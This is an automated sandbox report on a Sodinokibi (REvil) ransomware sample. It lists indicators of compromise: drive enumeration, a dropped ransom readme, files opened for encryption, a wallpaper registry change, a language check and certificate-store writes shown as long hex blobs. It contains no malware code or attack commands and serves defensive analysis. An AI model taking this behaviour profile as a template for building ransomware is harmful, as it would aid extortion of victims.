Malware Analysis Report

2025-01-18 18:28

Sample ID 241223-1h2bvaslgk
Target JaffaCakes118_c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72
SHA256 c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72
Tags
sodinokibi $2a$10$3aloagguasu5qrj8y1pyzeu93mmqzm6yvgd7yb83at6o21pmw2lcu 51 discovery ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72

Threat Level: Known bad

The file JaffaCakes118_c324b74a5fb1fdf9e34780cf3f6079b23cf3b2e52b422cf760d8bee7090b3e72 was found to be: Known bad.

Malicious Activity Summary

sodinokibi $2a$10$3aloagguasu5qrj8y1pyzeu93mmqzm6yvgd7yb83at6o21pmw2lcu 51 discovery ransomware

Sodinokibi family

Sodin,Sodinokibi,REvil

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Unsigned PE

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-23 21:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-23 21:39

Reported

2024-12-23 21:42

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

Signatures

Sodin,Sodinokibi,REvil

ransomware sodinokibi

Sodinokibi family

sodinokibi

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5s39a8627w.bmp" C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created \??\c:\program files\w7ld957-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File created \??\c:\program files (x86)\w7ld957-readme.txt C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\DismountTest.3g2 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RemoveResume.emf C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SendDeny.rm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\TestMove.m4a C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\BlockDisable.TS C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\HideConfirm.mhtml C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\PopRequest.bmp C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ResizeStop.otf C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RestartRedo.xlsx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RestoreRedo.mht C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SkipSelect.asx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SyncClear.wax C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\DismountComplete.contact C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\EditConvertFrom.M2T C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\InstallComplete.cfg C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\WatchEnable.html C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ConnectDisconnect.fon C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ConvertToUnlock.snd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RestoreMove.xlsx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\WriteCompress.ogg C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ConnectSelect.mpe C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ReceiveOptimize.mpg C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\RedoUndo.asf C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SelectReceive.pcx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SubmitConfirm.mpe C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\SkipMeasure.jpeg C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\FormatMeasure.vstx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\InitializeRestore.bmp C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\ShowGrant.wmx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UninstallRedo.xltm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\DenyUnlock.vsd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\InstallStart.xlsb C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\MountRead.htm C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\NewInitialize.wma C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UnprotectUnpublish.ogg C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
File opened for modification \??\c:\program files\UnpublishWatch.xlsx C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c0000000100000004000000001000000400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9